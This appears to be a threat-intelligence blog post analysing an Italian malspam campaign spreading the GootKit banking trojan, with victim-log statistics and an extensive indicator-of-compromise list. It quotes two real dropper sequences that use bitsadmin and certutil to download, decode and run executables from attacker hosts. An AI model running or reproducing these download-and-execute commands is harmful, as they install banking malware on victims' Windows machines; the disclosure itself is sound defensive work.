The TaxOlolo Affair – A Prequel and a Sequel

Why this article?

Some news have been published recently about a “new” malspam campaign targetting italian users, such as these two:

In this campaign, the attackers are sending out forged spam messages impersonating the Italian Department of Treasury (Ministero dell’Economia e delle Finanze). The messages contain a link leading to the download and execution of a banking trojan, apparently a new variant of the already known GootKit, in the form of different executable files.

These malicious executable files are downloaded from various drop points hosted on different domains. Analyzing these domains, it turned out that there was a directory listing enabled, due to a misconfiguration left by the attackers, making it possible to access the campaign logs.

There are already a number of articles explaining the methodology of the attack from a technical point of view, so we are not focusing on that. In this article, we will present our findings about the presence of a very similar campaign, back in August of the last year. Furthermore, we will take a look into some juicy information regarding the victims.

Our Findings

We started analyzing the public IoCs of the current campaign. In particular, we focused on the domains of the drop points: all of them result as registered on the same IP address: 185.61.152.71.

Analyzing the drop point IP, it has been possible to detect a misconfiguration that allowed listing the webserver content (now not accessible anymore, due to the deactivation of the registrant account). In the listed files, we did identify all the delivered malware samples, some control functions, and the log files of the campaign. In particular, there was 5 different log files, as shown below:

The most interesting ones are “log_file.txt“, “log_file_doc.txt” and “logThemes141.txt“, because they contain the status of every malware delivery (delivery OK or failed) to the victims, each one referring to a specific executable file (54, 54_zip and 1t.exe). Some information about the victims such as IP address, country, user agent used to access the executable file, timestamp of the request and whois information are also contained.

In the image below an extract of the file “log_file.txt” is shown (all the victims’ IP addresses have been obscured for privacy reasons):

We carried out some numerical and distributional analysis on these last three log files, about the geolocation and the number of different files downloaded by the victims. All the results are presented below.

 

From left to right: the distribution of the different second stages downloaded, the total count of download requests, and their outcome

 

Country distribution of the download requests by victims – based on IP geolocation

 

Left: Country distribution of the successful downloads (based on IP geolocation) – Lower Right: downloads outcome distribution in Italy

As we can see from the count of successful downloads (upper-right), the campaign clearly focuses on italian targets

 

 

TOP100 of the targetted companies – based on whois information

Regarding targetted ISPs matches, it is highly probable that their customers are included

 

Then, we proceeded to analyze the “requestsTheme141Exe.txt” log file, containing every single GET request made by the victims to the drop point. The queried domain of the drop point is also present for each request: here we discovered 14 further domains, not mentioned in any IoC list at the present time (listed at the end of this publication – in the IoCs Lists section).

 

 

From a deeper analysis on the newly identified drop point domains, we identified a Windows batch file named “documento dicembre 2017.bat“ – very similar to the current dropper, and dating back to last December. It is hown in the following figure:

Thanks to this finding, we can assert that the attackers’ infrastructure was already built at that time, and they just updated the documents used in the newest campaign.

Continuing the researches on the newly found domains, we identified 1 further spam email message used in the campaign. Here we found out the following new sender address: info@lc-hc.org. In the following figure the identified message is shown:

 

 

In August, 2017 we found some traces of another similar malspam campaign that we analyzed at that time. In particular, the TTPs similarity consist of:

  • the delivered malware familiy: GootKit banking trojan
  • the infection vector: a malspam email message
  • the dropper: a file containing some command line instructions
  • the targets: italian companies

Here is the comparison between the two droppers:

Old (August, 2017): a .lnk file used to launch the bitsadmin Windows utility to download the second stage

cmd.exe /k bitsadmin /transfer cola /priority high http://icaan.evaklaw.com/load11.bin %AppData%\host11.exe
%AppData%\host11.exe
exit

Current (January, 2018): a .bat file used to laung the certutil Windows utility to download the second stage

certutil -urlcache -split -f http://lawrencekamin.com/images2.php %TEMP%\image.tmp > NUL
certutil -decode %TEMP%\image.tmp %TEMP%\ZxCCAdoHost.exe > NUL
start %TEMP%\ZxCCAdoHost.exe

These 2 campaigns are probably linked each other (is the current one the evolution of the August campaign?) and we are currently working to confirm this.

 

We have already updated our global threat database EyeOnThreat™ with all the IoCs related to this campaign.

 

Contact Us

If you want more information about this threat, feel free to send us a mail to our mailbox supporto[.]security-intelligence[@]lutech[.]it.

IoCs Lists

The following table shows a list of the IoCs we collected from public sources and produced with our analysis.

Threat IoC IoC Type IoC Source
info@amber-kate.com Malspam Email Address Public
info@fallriverproductions.com Malspam Email Address Public
fugazzi324@intelectronica.com Malspam Email Address Public
critelli6693@intelectronica.com Malspam Email Address Lutech
info@lc-hc.org Malspam Email Address Lutech
185.61.152.71 Drop Point IP Address Public
239outdoors.com Drop Point Domain Public
bentlabel.com Drop Point Domain Public
cdvdautomator.com Drop Point Domain Public
cloudblueprintprogram.com Drop Point Domain Public
cnchalftone.com Drop Point Domain Public
comedyyall.com Drop Point Domain Public
conticellolaw.com Drop Point Domain Public
couplesdoingbusiness.com Drop Point Domain Public
dvoper.com Drop Point Domain Public
equinnex.com Drop Point Domain Public
ericandchrissy.com Drop Point Domain Public
evelynleekley.com Drop Point Domain Public
expungementstennessee.com Drop Point Domain Public
flaveme.com Drop Point Domain Public
grkisland.com Drop Point Domain Public
healingfoodconsulting.com Drop Point Domain Public
hertzsynergy.com Drop Point Domain Public
hollywoodisruption.com Drop Point Domain Public
home-sphere.com Drop Point Domain Public
integrativenutritiontherapy.com Drop Point Domain Public
jdkanyuk.com Drop Point Domain Public
kineloveclips.com Drop Point Domain Public
kylesinger.com Drop Point Domain Public
legionchristmas.com Drop Point Domain Public
menshoesonlinestore.com Drop Point Domain Public
microtiasurgery.com Drop Point Domain Public
movielotbar.com Drop Point Domain Public
muiienweg.com Drop Point Domain Public
niarhoslondon.com Drop Point Domain Public
opsantorinitours.com Drop Point Domain Public
progunjobs.com Drop Point Domain Public
rocketpak.com Drop Point Domain Public
scottishwindowsolutions.com Drop Point Domain Public
silkygames.com Drop Point Domain Public
snapshotsandwhatnots.com Drop Point Domain Public
snotterkind.com Drop Point Domain Public
solespin.com Drop Point Domain Public
strangerthanchristmas.com Drop Point Domain Public
synchronr.com Drop Point Domain Public
taramadden.com Drop Point Domain Public
terento.website Drop Point Domain Public
theargumint.com Drop Point Domain Public
thegildedwren.com Drop Point Domain Public
thejourneytogodsheart.com Drop Point Domain Public
thesaltybody.com Drop Point Domain Public
topsantorinitours.com Drop Point Domain Public
tuftandneedles.com Drop Point Domain Public
videospanishlessons.com Drop Point Domain Public
vovachka.com Drop Point Domain Public
wall-runners.com Drop Point Domain Public
war-arena.com Drop Point Domain Public
www.scottishwindowsolutions.com Drop Point Domain Public
z1logistics.com Drop Point Domain Public
zayantetinyhomes.com Drop Point Domain Public
zefeed.com Drop Point Domain Public
cmaccreditexperts.com Drop Point Domain Lutech
computerfunforkids.com Drop Point Domain Lutech
craftygypsy.com Drop Point Domain Lutech
donaldmowldsplasticsurgery.com Drop Point Domain Lutech
empirewrap.com Drop Point Domain Lutech
eternalnowband.com Drop Point Domain Lutech
fosteria.com Drop Point Domain Lutech
freedomfactoryprogram.com Drop Point Domain Lutech
jeanatcheson.com Drop Point Domain Lutech
lawrencekamin.com Drop Point Domain Lutech
projectsift.com Drop Point Domain Lutech
rkt88edmo.com Drop Point Domain Lutech
sockbattles.com Drop Point Domain Lutech
youngstownmagazine.com Drop Point Domain Lutech
https://as400.r1-it.storage.cloud.it/f24_acconti_codice.zip Drop Point URL Lutech
https://lc-hc.us16.list-manage.com/track/click?u=8d5d5f11d569ee79c989c512a&id=922a35f30e&e=edf091d37c Drop Point URL Lutech
185.44.105.97 CnC IP Address Public
ns15.dreamsinthesun.com CnC Domain Public
bdi2.nomadicdecorator.com CnC Domain Public
elis.k9redemptionrescue.com CnC Domain Public
api.hailstorm360.com CnC Domain Public
cerera.survivalbid.com CnC Domain Public
mark.k9redemptionrescue.org CnC Domain Public
nsc.dayswithsunrays.com CnC Domain Public
at.moonbeammagic.com CnC Domain Public
ssl.vci-cfo.com CnC Domain Public
sip3.propertiesandprojects.com CnC Domain Public
host1.jodiray.com CnC Domain Public
note.lawrencechoy.com CnC Domain Public
63d6927881d4978da4e162c17d82e9c009d0a93e Malicious File Hash Public
7ea33f51b6c4aa54beee7fd878886339c22d2232 Malicious File Hash Public
8cae0dc9255978a35cfd8db64cbe80001400de9b Malicious File Hash Public
839ff9f4c3980ac67d4cbef296520ee364a0911f Malicious File Hash Public
61f37aaa4caaf32546fabf7d21cfc64f7cb18a1342b425efb037cb62edf90743 Malicious File Hash Lutech
3e2259686abf25454a7d63429623d7619f68400411b2e5e166730cd5c843499c Malicious File Hash Lutech
2880ebfc06fd1e26268c80f62ddc935200c10f402fbbcd228af641321540d8e3 Malicious File Hash Lutech
404dd27b6989fc4d38ac08e6f9fa25c4a060713352c1e83c92cef1fb01ff0a09 Malicious File Hash Lutech
3cd60986a31dd46d2dfc47882e64a6f2df39f27285d98af96498a2ecda219864 Malicious File Hash Lutech

Authors

Fabio Bellani, Luca Sangalli

Leave a Comment

Your email address will not be published.